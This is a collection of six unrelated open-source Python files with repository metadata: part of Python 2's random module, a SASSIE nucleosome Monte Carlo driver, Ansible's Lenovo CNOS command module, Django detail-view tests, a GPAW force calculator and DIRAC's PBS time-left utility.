## http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
## for Ivan Frohne's insightful analysis of why the original implementation:
##
## def betavariate(self, alpha, beta):
## # Discrete Event Simulation in C, pp 87-88.
##
## y = self.expovariate(alpha)
## z = self.expovariate(1.0/beta)
## return z/(y+z)
##
## was dead wrong, and how it probably got that way.
def betavariate(self, alpha, beta):
"""Beta distribution.
Conditions on the parameters are alpha > 0 and beta > 0.
Returned values range between 0 and 1.
"""
# This version due to Janne Sinkkonen, and matches all the std
# texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution").
y = self.gammavariate(alpha, 1.)
if y == 0:
return 0.0
else:
return y / (y + self.gammavariate(beta, 1.))
## -------------------- Pareto --------------------
def paretovariate(self, alpha):
"""Pareto distribution. alpha is the shape parameter."""
# Jain, pg. 495
u = 1.0 - self.random()
return 1.0 / pow(u, 1.0/alpha)
## -------------------- Weibull --------------------
def weibullvariate(self, alpha, beta):
"""Weibull distribution.
alpha is the scale parameter and beta is the shape parameter.
"""
# Jain, pg. 499; bug fix courtesy Bill Arms
u = 1.0 - self.random()
return alpha * pow(-_log(u), 1.0/beta)
## -------------------- Wichmann-Hill -------------------
class WichmannHill(Random):
VERSION = 1 # used by getstate/setstate
def seed(self, a=None):
"""Initialize internal state from hashable object.
None or no argument seeds from current time or from an operating
system specific randomness source if available.
If a is not None or an int or long, hash(a) is used instead.
If a is an int or long, a is used directly. Distinct values between
0 and 27814431486575L inclusive are guaranteed to yield distinct
internal states (this guarantee is specific to the default
Wichmann-Hill generator).
"""
if a is None:
try:
a = long(_hexlify(_urandom(16)), 16)
except NotImplementedError:
import time
a = long(time.time() * 256) # use fractional seconds
if not isinstance(a, (int, long)):
a = hash(a)
a, x = divmod(a, 30268)
a, y = divmod(a, 30306)
a, z = divmod(a, 30322)
self._seed = int(x)+1, int(y)+1, int(z)+1
self.gauss_next = None
def random(self):
"""Get the next random number in the range [0.0, 1.0)."""
# Wichman-Hill random number generator.
#
# Wichmann, B. A. & Hill, I. D. (1982)
# Algorithm AS 183:
# An efficient and portable pseudo-random number generator
# Applied Statistics 31 (1982) 188-190
#
# see also:
# Correction to Algorithm AS 183
# Applied Statistics 33 (1984) 123
#
# McLeod, A. I. (1985)
# A remark on Algorithm AS 183
# Applied Statistics 34 (1985),198-200
# This part is thread-unsafe:
# BEGIN CRITICAL SECTION
x, y, z = self._seed
x = (171 * x) % 30269
y = (172 * y) % 30307
z = (170 * z) % 30323
self._seed = x, y, z
# END CRITICAL SECTION
# Note: on a platform using IEEE-754 double arithmetic, this can
# never return 0.0 (asserted by Tim; proof too long for a comment).
return (x/30269.0 + y/30307.0 + z/30323.0) % 1.0
def getstate(self):
"""Return internal state; can be passed to setstate() later."""
return self.VERSION, self._seed, self.gauss_next
def setstate(self, state):
"""Restore internal state from object returned by getstate()."""
version = state[0]
if version == 1:
version, self._seed, self.gauss_next = state
else:
raise ValueError("state with version %s passed to "
"Random.setstate() of version %s" %
(version, self.VERSION))
def jumpahead(self, n):
"""Act as if n calls to random() were made, but quickly.
n is an int, greater than or equal to 0.
Example use: If you have 2 threads and know that each will
consume no more than a million random numbers, create two Random
objects r1 and r2, then do
r2.setstate(r1.getstate())
r2.jumpahead(1000000)
Then r1 and r2 will use guaranteed-disjoint segments of the full
period.
"""
if not n >= 0:
raise ValueError("n must be >= 0")
x, y, z = self._seed
x = int(x * pow(171, n, 30269)) % 30269
y = int(y * pow(172, n, 30307)) % 30307
z = int(z * pow(170, n, 30323)) % 30323
self._seed = x, y, z
def __whseed(self, x=0, y=0, z=0):
"""Set the Wichmann-Hill seed from (x, y, z).
These must be integers in the range [0, 256).
"""
if not type(x) == type(y) == type(z) == int:
raise TypeError('seeds must be integers')
if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256):
raise ValueError('seeds must be in range(0, 256)')
if 0 == x == y == z:
# Initialize from current time
import time
t = long(time.time() * 256)
t = int((t&0xffffff) ^ (t>>24))
t, x = divmod(t, 256)
t, y = divmod(t, 256)
t, z = divmod(t, 256)
# Zero is a poor seed, so substitute 1
self._seed = (x or 1, y or 1, z or 1)
self.gauss_next = None
def whseed(self, a=None):
"""Seed from hashable object's hash code.
None or no argument seeds from current time. It is not guaranteed
that objects with distinct hash codes lead to distinct internal
states.
This is obsolete, provided for compatibility with the seed routine
used prior to Python 2.1. Use the .seed() method instead.
"""
if a is None:
self.__whseed()
return
a = hash(a)
a, x = divmod(a, 256)
a, y = divmod(a, 256)
a, z = divmod(a, 256)
x = (x + a) % 256 or 1
y = (y + a) % 256 or 1
z = (z + a) % 256 or 1
self.__whseed(x, y, z)
## --------------- Operating System Random Source ------------------
class SystemRandom(Random):
"""Alternate random number generator using sources provided
by the operating system (such as /dev/urandom on Unix or
CryptGenRandom on Windows).
Not available on all systems (see os.urandom() for details).
"""
def random(self):
"""Get the next random number in the range [0.0, 1.0)."""
return (long(_hexlify(_urandom(7)), 16) >> 3) * RECIP_BPF
def getrandbits(self, k):
"""getrandbits(k) -> x. Generates a long int with k random bits."""
if k <= 0:
raise ValueError('number of bits must be greater than zero')
if k != int(k):
raise TypeError('number of bits should be an integer')
bytes = (k + 7) // 8 # bits / 8 and rounded up
x = long(_hexlify(_urandom(bytes)), 16)
return x >> (bytes * 8 - k) # trim excess bits
def _stub(self, *args, **kwds):
"Stub method. Not used for a system random number generator."
return None
seed = jumpahead = _stub
def _notimplemented(self, *args, **kwds):
"Method should not be called for a system random number generator."
raise NotImplementedError('System entropy source does not have state.')
getstate = setstate = _notimplemented
## -------------------- test program --------------------
def _test_generator(n, func, args):
import time
print n, 'times', func.__name__
total = 0.0
sqsum = 0.0
smallest = 1e10
largest = -1e10
t0 = time.time()
for i in range(n):
x = func(*args)
total += x
sqsum = sqsum + x*x
smallest = min(x, smallest)
largest = max(x, largest)
t1 = time.time()
print round(t1-t0, 3), 'sec,',
avg = total/n
stddev = _sqrt(sqsum/n - avg*avg)
print 'avg %g, stddev %g, min %g, max %g' % \
(avg, stddev, smallest, largest)
def _test(N=2000):
_test_generator(N, random, ())
_test_generator(N, normalvariate, (0.0, 1.0))
_test_generator(N, lognormvariate, (0.0, 1.0))
_test_generator(N, vonmisesvariate, (0.0, 1.0))
_test_generator(N, gammavariate, (0.01, 1.0))
_test_generator(N, gammavariate, (0.1, 1.0))
_test_generator(N, gammavariate, (0.1, 2.0))
_test_generator(N, gammavariate, (0.5, 1.0))
_test_generator(N, gammavariate, (0.9, 1.0))
_test_generator(N, gammavariate, (1.0, 1.0))
_test_generator(N, gammavariate, (2.0, 1.0))
_test_generator(N, gammavariate, (20.0, 1.0))
_test_generator(N, gammavariate, (200.0, 1.0))
_test_generator(N, gauss, (0.0, 1.0))
_test_generator(N, betavariate, (3.0, 3.0))
_test_generator(N, triangular, (0.0, 1.0, 1.0/3.0))
# Create one instance, seeded from current time, and export its methods
# as module-level functions. The functions share state across all uses
#(both in the user's code and in the Python libraries), but that's fine
# for most programs and is easier for the casual user than making them
# instantiate their own Random() instance.
_inst = Random()
seed = _inst.seed
random = _inst.random
uniform = _inst.uniform
triangular = _inst.triangular
randint = _inst.randint
choice = _inst.choice
randrange = _inst.randrange
sample = _inst.sample
shuffle = _inst.shuffle
normalvariate = _inst.normalvariate
lognormvariate = _inst.lognormvariate
expovariate = _inst.expovariate
vonmisesvariate = _inst.vonmisesvariate
gammavariate = _inst.gammavariate
gauss = _inst.gauss
betavariate = _inst.betavariate
paretovariate = _inst.paretovariate
weibullvariate = _inst.weibullvariate
getstate = _inst.getstate
setstate = _inst.setstate
jumpahead = _inst.jumpahead
getrandbits = _inst.getrandbits
if __name__ == '__main__':
_test()
|
alanjw/GreenOpenERP-Win-X86
|
python/Lib/random.py
|
Python
|
agpl-3.0
| 33,174
|
[
"Gaussian"
] |
830acb521d9c9d616ff4c4a725d9b1283aafe931e537b4e9192b6287cbeb4d9a
|
'''
Driver method to run the monte_carlo module using mixed DNA and protein moves
with several options for a nucleosomecore particle (NCP)
$Id: gui_mimic_ncp.py 3037 2016-03-01 19:55:18Z schowell $
'''
import sys
import multiprocessing
import sassie.interface.input_filter as input_filter
import sassie.simulate.torsion_angle_monte_carlo.monte_carlo as monte_carlo
svariables = {}
################################# user input ##################################
################################# user input ##################################
################################# user input ##################################
# input files
pdbfile='../../../developer_files_for_testing/torsion_angle_monte_carlo/c36_w601_ncp_min.pdb'
psffile='../../../developer_files_for_testing/torsion_angle_monte_carlo/c36_w601_ncp.psf'
# output files
dcdfile='w601_ncp.dcd'
# minimization parameters
psf_flag = True # openmm minimization does not work with dsDNA
max_steps = '5000'
energy_convergence = '1.0'
step_size = '0.002'
# setup flexible regions
basis_string_array = []
post_basis_string_array = []
runname = 'run_' + pdbfile[:-4] + '_mixed_MC'
# add the flexible DNA ends
basis_string_array.append(
'(segname DNA1 and resid > 14 and resid < 55) or (segname DNA2 and resid > 299 and resid < 340)'
)
basis_string_array.append(
'(segname DNA1 and resid > 120 and resid < 161) or (segname DNA2 and resid > 193 and resid < 234)'
)
# add the flexible protein tails
basis_string_array.append(
'segname 1H2A and resid < 20 and resid > 1'
)
basis_string_array.append(
'segname 2H2A and resid < 20 and resid > 1'
)
basis_string_array.append(
'segname 1H2B and resid < 27 and resid > 1'
)
basis_string_array.append(
'segname 2H2B and resid < 27 and resid > 1'
)
basis_string_array.append(
'segname 1H3 and resid < 40 and resid > 1'
)
basis_string_array.append(
'segname 2H3 and resid < 40 and resid > 1'
)
basis_string_array.append(
'segname 1H4 and resid < 31 and resid > 1'
)
basis_string_array.append(
'segname 2H4 and resid < 31 and resid > 1'
)
# post region definitions for DNA ends
post_basis_string_array.append(
'(segname DNA1 and resid > 54) or (segname DNA2 and resid < 300) or segname 1H2A or segname 2H2A or segname 1H2B or segname 2H2B or segname 1H3 or segname 2H3 or segname 1H4 or segname 2H4'
)
post_basis_string_array.append(
'(segname DNA1 and resid 161) or (segname DNA2 and resid 193)'
)
# post region definitions for protein tails
post_basis_string_array.append(
'segname 1H2A and resid < 2'
)
post_basis_string_array.append(
'segname 2H2A and resid < 2'
)
post_basis_string_array.append(
'segname 1H2B and resid < 2'
)
post_basis_string_array.append(
'segname 2H2B and resid < 2'
)
post_basis_string_array.append(
'segname 1H3 and resid < 2'
)
post_basis_string_array.append(
'segname 2H3 and resid < 2'
)
post_basis_string_array.append(
'segname 1H4 and resid < 2'
)
post_basis_string_array.append(
'segname 2H4 and resid < 2'
)
rotation_type_array = [
'double_stranded_nucleic_torsion',
'double_stranded_nucleic_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
]
delta_theta_array = '10.0, 10.0, 30.0, 30.0, 30.0, 30.0, 30.0, 30.0, 30.0, 30.0'
n_flex_regions = len(basis_string_array)
number_of_flexible_regions = str(n_flex_regions)
rotation_direction_array = ['reverse'] * n_flex_regions # irrelevant
dta = delta_theta_array = '10.0'
for i in xrange(n_flex_regions):
dta += ', ' + delta_theta_array
delta_theta_array = dta
if not delta_theta_array:
delta_theta_array = delta_theta = '10.0'
for i in xrange(n_flex_regions - 1):
delta_theta_array += ', ' + delta_theta
overlap_basis = 'heavy'
temperature = '300.0'
trial_steps = '1000'
goback = '1'
low_rg_cutoff = '0'
high_rg_cutoff = '400.0'
z_flag = False
z_cutoff = '0.0'
constraint_flag = False
constraint_file = 'constraints.txt'
directed_mc = '0'
nonbondflag = '0' # not sure what this is for
seed = '0,123' # set this to '1,123' ('0,123') to (not) set the seed
############################### end user input ################################
############################### end user input ################################
############################### end user input ################################
svariables['runname'] = (runname, 'string')
svariables['dcdfile'] = (dcdfile, 'string')
svariables['pdbfile'] = (pdbfile, 'string')
svariables['psffile'] = (psffile, 'string')
svariables['psf_flag'] = (psf_flag, 'string')
svariables['max_steps'] = (max_steps, 'int')
svariables['energy_convergence'] = (energy_convergence, 'float')
svariables['step_size'] = (step_size, 'float')
svariables['number_of_flexible_regions'] = (number_of_flexible_regions, 'int')
svariables['basis_string_array'] = (basis_string_array, 'string')
svariables['delta_theta_array'] = (delta_theta_array, 'float_array')
svariables['rotation_type_array'] = (rotation_type_array, 'string')
svariables['rotation_direction_array'] = (rotation_direction_array, 'string')
svariables['overlap_basis'] = (overlap_basis, 'string')
svariables['post_basis_string_array'] = (post_basis_string_array, 'string')
svariables['temperature'] = (temperature, 'float')
svariables['trial_steps'] = (trial_steps, 'int')
svariables['goback'] = (goback, 'int')
svariables['directed_mc'] = (directed_mc, 'float')
svariables['low_rg_cutoff'] = (low_rg_cutoff, 'float')
svariables['high_rg_cutoff'] = (high_rg_cutoff, 'float')
svariables['z_flag'] = (z_flag, 'boolean')
svariables['z_cutoff'] = (z_cutoff, 'float')
svariables['constraint_flag'] = (constraint_flag, 'boolean')
svariables['constraint_file'] = (constraint_file, 'string')
svariables['nonbondflag'] = (nonbondflag, 'int')
svariables['seed'] = (seed, 'int_array')
error, variables = input_filter.type_check_and_convert(svariables)
assert not error, 'ERROR: %s' % error
txtQueue=multiprocessing.JoinableQueue()
simulation = monte_carlo.simulation()
simulation.main(variables, txtQueue)
this_text = txtQueue.get(True, timeout=0.1)
# perform alignment
try:
import os
import subprocess
import sassie.util.file_utils as file_utils
import sassie.tools.align_driver as align_driver
dcd = os.path.join(runname, 'monte_carlo', dcdfile)
assert os.path.exists(dcd), 'no such file: %s' % dcd
align_basis = (
'((name[i] == "CA") and (segname[i] == "1H2A") and (resid[i] > 105) and (resid[i] < 115))'
)
inputs = align_driver.inputs()
inputs.path = ''
inputs.goal_filter = align_basis
inputs.move_filter = align_basis
inputs.goal = pdbfile
inputs.ref = pdbfile
inputs.move = dcd
inputs.out = dcd.replace('.dcd', '_al.dcd')
file_utils.mkdir_p(os.path.split(inputs.out)[0])
align_driver.align(inputs)
cmd = 'mv %s %s' % (inputs.out, inputs.move)
return_code = subprocess.call(cmd, shell=True)
if return_code:
print 'Failed to move output: %s' % cmd
except:
print 'Aligment of NCP failed'
|
madscatt/zazzie
|
src_2.7/sassie/simulate/torsion_angle_monte_carlo/gui_mimic_ncp_all_flex.py
|
Python
|
gpl-3.0
| 7,212
|
[
"OpenMM"
] |
a59b37f9eaa4a2e09509ea4737d04d423822c182c7056ea55fd9c7f6a0414fcc
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to send CLI commands to Lenovo Switches
# Lenovo Networking
#
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: cnos_command
author: "Dave Kasberg (@dkasberg)"
short_description: Execute a single command on devices running Lenovo CNOS
description:
- This module allows you to modify the switch running configuration. It provides a way to
execute a single CNOS command on a switch by evaluating the current running configuration
and executing the command only if the specific setting has not been already configured.
The CNOS command is passed as an argument of the method.
This module uses SSH to manage network device configuration.
The results of the operation will be placed in a directory named 'results'
that must be created by the user in their local directory to where the playbook is run.
For more information about this module from Lenovo and customizing it usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_command.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options:
clicommand:
description:
- This specifies the CLI command as an attribute to this method. The command is
passed using double quotes. The variables can be placed directly on to the CLI
commands or can be invoked from the vars directory.
required: true
default: Null
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_command. These are written in the main.yml file of the tasks directory.
---
- name: Test Command
cnos_command:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['username'] }}"
password: "{{ hostvars[inventory_hostname]['password'] }}"
enablePassword: "{{ hostvars[inventory_hostname]['enablePassword'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_command_{{ inventory_hostname }}_output.txt"
clicommand: "display users"
'''
RETURN = '''
return value: |
On successful execution, the method returns a message in JSON format
[Command Applied]
Upon any failure, the method returns an error display string.
'''
import sys
import paramiko
import time
import argparse
import socket
import array
import json
import time
import re
try:
from ansible.module_utils import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
clicommand=dict(required=True),
outputfile=dict(required=True),
host=dict(required=True),
deviceType=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True),),
supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
cliCommand = module.params['clicommand']
deviceType = module.params['deviceType']
outputfile = module.params['outputfile']
hostIP = module.params['host']
output = ""
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# Go to config mode
output = output + cnos.waitForDeviceResponse("configure d\n", "(config)#", 2, remote_conn)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand + "\n", "(config)#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
# Logic to check when changes occur or not
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="CLI command executed and results saved in file ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
|
t0mk/ansible
|
lib/ansible/modules/network/lenovo/cnos_command.py
|
Python
|
gpl-3.0
| 5,726
|
[
"VisIt"
] |
70b71b4398223fae652bb892cff07deade4264fb9fabfd467742e2af79e66cfb
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.test import TestCase, override_settings
from django.test.client import RequestFactory
from django.views.generic.base import View
from django.views.generic.detail import SingleObjectTemplateResponseMixin
from django.views.generic.edit import ModelFormMixin
from .models import Artist, Author, Book, Page
@override_settings(ROOT_URLCONF='generic_views.urls')
class DetailViewTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.artist1 = Artist.objects.create(name='Rene Magritte')
cls.author1 = Author.objects.create(name='Roberto Bolaño', slug='roberto-bolano')
cls.author2 = Author.objects.create(name='Scott Rosenberg', slug='scott-rosenberg')
cls.book1 = Book.objects.create(name='2066', slug='2066', pages=800, pubdate=datetime.date(2008, 10, 1))
cls.book1.authors.add(cls.author1)
cls.book2 = Book.objects.create(
name='Dreaming in Code', slug='dreaming-in-code', pages=300, pubdate=datetime.date(2006, 5, 1)
)
cls.page1 = Page.objects.create(
content='I was once bitten by a moose.', template='generic_views/page_template.html'
)
def test_simple_object(self):
res = self.client.get('/detail/obj/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], {'foo': 'bar'})
self.assertIsInstance(res.context['view'], View)
self.assertTemplateUsed(res, 'generic_views/detail.html')
def test_detail_by_pk(self):
res = self.client.get('/detail/author/%s/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_missing_object(self):
res = self.client.get('/detail/author/500/')
self.assertEqual(res.status_code, 404)
def test_detail_object_does_not_exist(self):
self.assertRaises(ObjectDoesNotExist, self.client.get, '/detail/doesnotexist/1/')
def test_detail_by_custom_pk(self):
res = self.client.get('/detail/author/bycustompk/%s/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_slug(self):
res = self.client.get('/detail/author/byslug/scott-rosenberg/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], Author.objects.get(slug='scott-rosenberg'))
self.assertEqual(res.context['author'], Author.objects.get(slug='scott-rosenberg'))
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_custom_slug(self):
res = self.client.get('/detail/author/bycustomslug/scott-rosenberg/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], Author.objects.get(slug='scott-rosenberg'))
self.assertEqual(res.context['author'], Author.objects.get(slug='scott-rosenberg'))
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_pk_ignore_slug(self):
res = self.client.get('/detail/author/bypkignoreslug/%s-roberto-bolano/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_pk_ignore_slug_mismatch(self):
res = self.client.get('/detail/author/bypkignoreslug/%s-scott-rosenberg/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_pk_and_slug(self):
res = self.client.get('/detail/author/bypkandslug/%s-roberto-bolano/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_pk_and_slug_mismatch_404(self):
res = self.client.get('/detail/author/bypkandslug/%s-scott-rosenberg/' % self.author1.pk)
self.assertEqual(res.status_code, 404)
def test_verbose_name(self):
res = self.client.get('/detail/artist/%s/' % self.artist1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.artist1)
self.assertEqual(res.context['artist'], self.artist1)
self.assertTemplateUsed(res, 'generic_views/artist_detail.html')
def test_template_name(self):
res = self.client.get('/detail/author/%s/template_name/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/about.html')
def test_template_name_suffix(self):
res = self.client.get('/detail/author/%s/template_name_suffix/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_view.html')
def test_template_name_field(self):
res = self.client.get('/detail/page/%s/field/' % self.page1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.page1)
self.assertEqual(res.context['page'], self.page1)
self.assertTemplateUsed(res, 'generic_views/page_template.html')
def test_context_object_name(self):
res = self.client.get('/detail/author/%s/context_object_name/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['thingy'], self.author1)
self.assertNotIn('author', res.context)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_duplicated_context_object_name(self):
res = self.client.get('/detail/author/%s/dupe_context_object_name/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertNotIn('author', res.context)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_deferred_queryset_template_name(self):
class FormContext(SingleObjectTemplateResponseMixin):
request = RequestFactory().get('/')
model = Author
object = Author.objects.defer('name').get(pk=self.author1.pk)
self.assertEqual(FormContext().get_template_names()[0], 'generic_views/author_detail.html')
def test_deferred_queryset_context_object_name(self):
class FormContext(ModelFormMixin):
request = RequestFactory().get('/')
model = Author
object = Author.objects.defer('name').get(pk=self.author1.pk)
fields = ('name',)
form_context_data = FormContext().get_context_data()
self.assertEqual(form_context_data['object'], self.author1)
self.assertEqual(form_context_data['author'], self.author1)
def test_invalid_url(self):
self.assertRaises(AttributeError, self.client.get, '/detail/author/invalid/url/')
def test_invalid_queryset(self):
self.assertRaises(ImproperlyConfigured, self.client.get, '/detail/author/invalid/qs/')
def test_non_model_object_with_meta(self):
res = self.client.get('/detail/nonmodel/1/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'].id, "non_model_1")
|
DONIKAN/django
|
tests/generic_views/test_detail.py
|
Python
|
bsd-3-clause
| 8,387
|
[
"MOOSE"
] |
fbdd12a347395cccccf14f0ae04331101789f39f2536a95c03e0792bf3728373
|
import numpy as np
from gpaw.xc.hybrid import HybridXCBase
class ForceCalculator:
def __init__(self, timer):
self.timer = timer
self.reset()
def reset(self):
self.F_av = None
def calculate(self, wfs, dens, ham):
"""Return the atomic forces."""
assert not isinstance(ham.xc, HybridXCBase)
if self.F_av is not None:
return self.F_av
self.timer.start('Force calculation')
natoms = len(wfs.setups)
self.F_av = np.zeros((natoms, 3))
# Force from projector functions (and basis set):
wfs.calculate_forces(ham, self.F_av)
try:
# ODD functionals need force corrections for each spin
correction = ham.xc.setup_force_corrections
except AttributeError:
pass
else:
correction(self.F_av)
if wfs.bd.comm.rank == 0 and wfs.kd.comm.rank == 0:
ham.calculate_forces(dens, self.F_av)
wfs.world.broadcast(self.F_av, 0)
self.F_av = wfs.symmetry.symmetrize_forces(self.F_av)
self.timer.stop('Force calculation')
return self.F_av
|
robwarm/gpaw-symm
|
gpaw/forces.py
|
Python
|
gpl-3.0
| 1,191
|
[
"GPAW"
] |
a2f48171fb47f71df4af1c8121dddf0a74fabc5b2ef012f493905f4affbf1527
|
""" The PBS TimeLeft utility interrogates the PBS batch system for the
current CPU and Wallclock consumed, as well as their limits.
"""
__RCSID__ = "$Id$"
import os
import re
import time
from DIRAC import gLogger, S_OK, S_ERROR
from DIRAC.Core.Utilities.TimeLeft.TimeLeft import runCommand
class PBSTimeLeft( object ):
#############################################################################
def __init__( self ):
""" Standard constructor
"""
self.log = gLogger.getSubLogger( 'PBSTimeLeft' )
self.jobID = os.environ.get( 'PBS_JOBID' )
self.queue = os.environ.get( 'PBS_O_QUEUE' )
pbsPath = os.environ.get( 'PBS_O_PATH' )
if pbsPath:
os.environ['PATH'] += ':' + pbsPath
self.cpuLimit = None
self.wallClockLimit = None
self.log.verbose( 'PBS_JOBID=%s, PBS_O_QUEUE=%s' % ( self.jobID, self.queue ) )
self.startTime = time.time()
#############################################################################
def getResourceUsage( self ):
"""Returns a dictionary containing CPUConsumed, CPULimit, WallClockConsumed
and WallClockLimit for current slot. All values returned in seconds.
"""
cmd = 'qstat -f %s' % ( self.jobID )
result = runCommand( cmd )
if not result['OK']:
return result
cpu = None
cpuLimit = None
wallClock = None
wallClockLimit = None
lines = str( result['Value'] ).split( '\n' )
for line in lines:
info = line.split()
if re.search( '.*resources_used.cput.*', line ):
if len( info ) >= 3:
cpuList = info[2].split( ':' )
newcpu = ( float( cpuList[0] ) * 60 + float( cpuList[1] ) ) * 60 + float( cpuList[2] )
if not cpu or newcpu > cpu:
cpu = newcpu
else:
self.log.warn( 'Problem parsing "%s" for CPU consumed' % line )
if re.search( '.*resources_used.pcput.*', line ):
if len( info ) >= 3:
cpuList = info[2].split( ':' )
newcpu = ( float( cpuList[0] ) * 60 + float( cpuList[1] ) ) * 60 + float( cpuList[2] )
if not cpu or newcpu > cpu:
cpu = newcpu
else:
self.log.warn( 'Problem parsing "%s" for CPU consumed' % line )
if re.search( '.*resources_used.walltime.*', line ):
if len( info ) >= 3:
wcList = info[2].split( ':' )
wallClock = ( float( wcList[0] ) * 60 + float( wcList[1] ) ) * 60 + float( wcList[2] )
else:
self.log.warn( 'Problem parsing "%s" for elapsed wall clock time' % line )
if re.search( '.*Resource_List.cput.*', line ):
if len( info ) >= 3:
cpuList = info[2].split( ':' )
newcpuLimit = ( float( cpuList[0] ) * 60 + float( cpuList[1] ) ) * 60 + float( cpuList[2] )
if not cpuLimit or newcpuLimit < cpuLimit:
cpuLimit = newcpuLimit
else:
self.log.warn( 'Problem parsing "%s" for CPU limit' % line )
if re.search( '.*Resource_List.pcput.*', line ):
if len( info ) >= 3:
cpuList = info[2].split( ':' )
newcpuLimit = ( float( cpuList[0] ) * 60 + float( cpuList[1] ) ) * 60 + float( cpuList[2] )
if not cpuLimit or newcpuLimit < cpuLimit:
cpuLimit = newcpuLimit
else:
self.log.warn( 'Problem parsing "%s" for CPU limit' % line )
if re.search( '.*Resource_List.walltime.*', line ):
if len( info ) >= 3:
wcList = info[2].split( ':' )
wallClockLimit = ( float( wcList[0] ) * 60 + float( wcList[1] ) ) * 60 + float( wcList[2] )
else:
self.log.warn( 'Problem parsing "%s" for wall clock limit' % line )
consumed = {'CPU':cpu, 'CPULimit':cpuLimit, 'WallClock':wallClock, 'WallClockLimit':wallClockLimit}
self.log.debug( consumed )
if None not in consumed.values():
self.log.debug( "TimeLeft counters complete:", str( consumed ) )
return S_OK( consumed )
else:
missed = [key for key, val in consumed.items() if val is None]
self.log.info( 'Could not determine parameter', ','.join( missed ) )
self.log.debug( 'This is the stdout from the batch system call\n%s' % ( result['Value'] ) )
